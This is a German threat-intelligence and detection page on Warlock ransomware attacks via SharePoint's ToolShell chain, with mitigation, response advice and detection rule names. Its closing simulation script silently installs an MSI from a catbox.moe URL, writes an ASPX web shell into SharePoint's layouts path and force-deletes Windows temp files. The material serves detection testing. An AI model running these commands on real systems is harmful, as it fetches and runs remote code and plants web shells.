Warlock Ransomware greift kritische Wasser- und Telekommunikationsinfrastruktur an
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein China-vernetzter Bedrohungsakteur, der als Longlegs verfolgt wird, setzt Warlock Ransomware ein, indem er Schwachstellen in Microsoft SharePoint ausnutzt. Die Gruppe verwendet eine ToolShell-Exploit-Kette für den initialen Zugang, bevor sie seitwärts über kompromittierte Netzwerke agiert. Die Angreifer wenden auch fortschrittliche Ausweichtechniken an, einschließlich der Ausnutzung von anfälligen Treibern zur Deaktivierung von Sicherheitssoftware und der Nutzung legitimer Cloud-Dienste für die Bereitstellung von Nutzlasten.
Untersuchung
Die Untersuchung verfolgte die Aktivität von der anfänglichen SharePoint-Ausnutzung bis zur Bereitstellung einer Webshell im LAYOUTS-Verzeichnis. Die Analysten beobachteten gefälschte ASP.NET-Maschinenschlüssel, die für Remotecodeausführung verwendet wurden, und Ransomware, die im SYSVOL-Share für die Verteilung im gesamten Domain-Netzwerk bereitgestellt wurde. Die Angriffskette umfasste auch DLL-Sideloading und die Ausnutzung der Tunneling-Funktionalität von Visual Studio Code für anhaltenden Zugriff.
Minderung
Organisationen sollten die Priorität auf die Patch-Verwaltung von Microsoft SharePoint Server legen, um bekannte ToolShell-Schwachstellen zu beheben. Die Durchsetzung strenger Kontrollen über signierte, aber anfällige Treiber kann helfen, BYOVD-Angriffe zu verhindern. Sicherheitsteams sollten auch die anomale Nutzung von Living-off-the-Land-Tools überwachen und den Zugriff auf den SYSVOL-Share für nicht-administrative Aktivitäten einschränken, um seitliche Bewegungen und Ransomware-Bereitstellungen zu reduzieren.
Reaktion
Wenn bösartige Aktivitäten festgestellt werden, sollten Vorfallreaktionsteams betroffene SharePoint-Server isolieren und den SYSVOL-Share auf unautorisierte Skripte oder Binärdateien prüfen. Führen Sie eine umfassende Überprüfung der Domain-Konten durch, konzentrieren Sie sich auf unautorisierte Hinzufügungen zur lokalen Administratorgruppe. Überprüfen Sie den Netzwerkverkehr auf ausgehende Verbindungen zu Dateifreigabediensten wie catbox.moe oder wasabisys.com, die für die Nutzlaststaging verwendet werden.
Angriffsfluss
Erkennungen
Benutzer zur lokalen Administratorgruppe hinzufügen (über die Befehlszeile)
Download oder Upload über Powershell (über die Befehlszeile)
Verdächtige Powershell-Strings (über die Befehlszeile)
.NET-Klassen/Methoden von verdächtigen ausgehenden Powershell-Befehlen aufrufen (über Prozess-Erstellung)
Mögliche Entdeckung von Netzwerkfreigaben (über die Befehlszeile)
Entdeckung verdächtiger Domain-Vertrauensstellungen (über die Befehlszeile)
Möglicher Versuch der Remote-Installation von MSI-Dateien (über die Befehlszeile)
Verdächtige Ausführung aus öffentlichem Benutzerprofil (über Prozess-Erstellung)
Verdächtige Powershell-Strings (über Powershell)
Verdächtige .NET-Methoden von Powershell aufrufen (über Powershell)
Mögliche Erstellung einer Webshell in Microsoft Exchange / Sharepoint-Verzeichnissen (über Datei-Ereignis)
Verdächtige Dateien im öffentlichen Benutzerprofil (über Datei-Ereignis)
Mögliche Dateninfiltration / Exfiltration / C2 über Drittanbieter-Services / -Tools (über Proxy)
Mögliche Dateninfiltration / Exfiltration / C2 über Drittanbieter-Services / -Tools (über DNS)
Verdächtige Command-and-Control-Anfragen zu Out-of-Band-Interaktionsdomains (über DNS)
IOCs (HashSha256) zur Erkennung: Angreifer der Warlock-Ransomware treffen Wasser- und Telekommunikationsbetreiber
Erkennung von bösartigen PowerShell-Befehlen zur Code-Ausführung [Windows Powershell]
Warlock-Ransomware-Inszenierung und -Ausführung über Netzwerkfreigaben [Windows-Datei-Ereignis]
Warlock-Ransomware-Indikatoren auf SharePoint-Servern [Windows-Prozess-Erstellung]
Simulation der Ausführung
Voraussetzung: Die Telemetrie- und Baseline-Pre-Flight-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennung zu verursachen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die erwartete Telemetrie zu erzeugen, die die Erkennungslogik erwartet. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angrifferzählung & Befehle: Der Gegner beabsichtigt, Warlock-Ransomware auf einem SharePoint-Server zu verteilen. Der Angriff beginnt mit der Nutzung von
msiexecum ein bösartiges MSI von einer remote von Angreifern gesteuerten Domain (catbox.moe) zu ziehen. Nach dem initialen Zugriff verwendet der Angreifer PowerShell, um eine bösartige ASPX Web-Shell in den SharePointlayout2sp.aspxPfad zu schreiben, indem eine Base64-kodierte Nutzlast verwendet wird, um einfache String-Filter zu umgehen. Schließlich versucht der Angreifer, eine bösartige .NET-Bibliothek direkt in den Speicher zu laden, indem erSystem.Workflow.ComponentModelverwendet, um Code auszuführen, ohne einen Datei-Footprint auf der Festplatte zu hinterlassen. -
Regressionstest-Skript:
# Warlock-Ransomware-Simulationsskript # HINWEIS: Dieses Skript ist nur für autorisierte Testzwecke. Write-Host "[!] Starten der Warlock-Ransomware-Simulation..." -ForegroundColor Red # 1. Simulierte MSIEXEC-Remote-Download-Simulation (Auswahl 3) Write-Host "[*] MSIEXEC-Remote-Payload-Download simulieren..." Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue # 2. Simulierte PowerShell-ASPX-Web-Shell-Drop-Simulation (Auswahl 1) # Wir verwenden den exakten String aus der Regel, um die Erkennung sicherzustellen Write-Host "[*] PowerShell Web Shell Drop via Base64 simulieren..." $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))""" Invoke-Expression $cmd1 # 3. Simuliertes reflektierendes Assembly-Laden (Auswahl 2) Write-Host "[*] Reflektierendes Assembly-Laden simulieren..." $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel" Invoke-Expression $cmd2 Write-Host "[+] Simulationsbefehle gesendet." -ForegroundColor Green -
Aufräumbefehle:
# Aufräumskript zur Entfernung aller während der Simulation erstellten Artefakte Write-Host "[!] Aufräumen von Simulationsartefakten..." -ForegroundColor Yellow # Entfernen Sie simulierte Dateien (Hinweis: In einem echten Test würden Sie die spezifischen erstellten Pfade anvisieren) # Da wir Dummy-Strings verwendet haben, stellen wir in erster Linie sicher, dass keine tatsächlichen bösartigen Dateien abgelegt wurden. Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Bereinigung abgeschlossen." -ForegroundColor Green